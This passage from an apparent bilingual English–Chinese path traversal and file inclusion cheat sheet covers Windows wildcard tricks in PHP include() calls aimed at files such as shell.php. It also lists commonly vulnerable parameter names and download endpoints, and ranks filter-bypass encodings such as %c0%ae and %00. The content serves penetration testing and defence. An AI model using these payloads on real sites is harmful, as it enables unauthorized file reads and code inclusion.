Windows文件路径中的<<和>通配符:

<< matches any extension, > matches single char

<<匹配任意扩展名,>匹配单个字符

include("php<<"); # Matches any .php* file include("shel>"); # Matches shell.php if only 1 char follows
include("php<<"); # 匹配任意.php*文件 include("shel>"); # 仅后续有1个字符时匹配shell.php

Useful when exact filename is unknown

适用于未知准确文件名的场景


---

---

19. PARAMETER NAMING PATTERNS & HIGH-FREQUENCY ENDPOINTS

19. 参数命名模式与高频漏洞端点

Common Vulnerable Parameter Names

常见易受攻击参数名

filename    filepath    path        file        url
template    page        include     dir         document
folder      root        pg          lang        doc
conf        data        content     name        src
inputFile   hdfile      XFileName   FileUrl     readfile
filename    filepath    path        file        url
template    page        include     dir         document
folder      root        pg          lang        doc
conf        data        content     name        src
inputFile   hdfile      XFileName   FileUrl     readfile

High-Frequency Vulnerable Endpoints

高频漏洞端点

Endpoint PatternFrequency
down.php
/ 
download.php
Very High
download.jsp
/ 
download.do
Very High
download.asp
/ 
download.aspx
High
readfile.php
/ 
file.php
High
export
/ 
report
endpoints		Medium
template
/ 
preview
endpoints		Medium
端点模式出现频率
down.php
/ 
download.php
极高
download.jsp
/ 
download.do
极高
download.asp
/ 
download.aspx
readfile.php
/ 
file.php
export
/ 
report
端点
template
/ 
preview
端点

Bypass Technique Distribution (from field research)

绕过技术分布(来自实战研究)

TechniquePrevalence
Absolute path direct accessMost common
WEB-INF/web.xml read (Java)Common
Base64 encoded path parameterModerate
Double URL encodingModerate
UTF-8 overlong encoding (
%c0%ae
)		Rare but effective
Null byte truncation (
%00
)		Legacy (PHP < 5.3.4)
技术出现概率
绝对路径直接访问最常见
WEB-INF/web.xml读取(Java)常见
Base64编码路径参数中等
双重URL编码中等
UTF-8超长编码(
%c0%ae
少见但效果好
空字节截断(
%00
旧版本适用(PHP < 5.3.4)